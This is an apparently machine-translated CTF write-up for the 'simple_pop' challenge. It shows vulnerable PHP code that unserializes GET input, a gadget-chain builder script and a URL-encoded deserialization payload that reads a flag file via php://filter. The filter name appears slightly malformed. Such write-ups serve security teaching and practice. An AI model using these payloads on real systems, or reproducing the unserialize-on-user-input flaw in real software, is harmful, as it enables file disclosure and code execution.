当前位置：网站首页>BMZCTF simple_ pop

BMZCTF simple_ pop

2022-07-03 04:15:00 【Listen to the snowflakes flying outside】

simple_pop

Open the topic to get the source code

Insert picture description here

This side is php The test site of pseudo agreement , Need to read useless.php

Insert picture description here

Decode to get the source code

<?php  
class Modifier {
    
    protected  $var;
    public function append($value){
    
        include($value);//flag.php
    }
    public function __invoke(){
    
        $this->append($this->var);
    }
}
 
class Show{
    
    public $source;
    public $str;
    public function __construct($file='index.php'){
    
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
    
        return $this->str->source;
    }
 
    public function __wakeup(){
    
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
    
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
 
class Test{
    
    public $p;
    public function __construct(){
    
        $this->p = array();
    }
 
    public function __get($key){
    
        $function = $this->p;
        return $function();
    }
}
 
if(isset($_GET['password'])){
    
    @unserialize($_GET['password']);
}
else{
    
    $a=new Show;
}
?>

This pop The chain is through show Class toString To trigger test Class get Last call Modifier invoke To get flag

<?php
    class Modifier
    {
    
        protected  $var = 'php://filter/convert.base64_encode/resource=/flag';
    }
    class Show
    {
    
        public $source;
        public $str;
    }
    class Test
    {
    
        public $p;
    }

    $m = new Modifier();
    $s = new Show();
    $t = new Test();

    $s -> source = $s;
    $s -> str = $t;
    $t -> p = $m;
    echo urlencode(serialize($s));

structure payload

?password=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64_encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D

Insert picture description here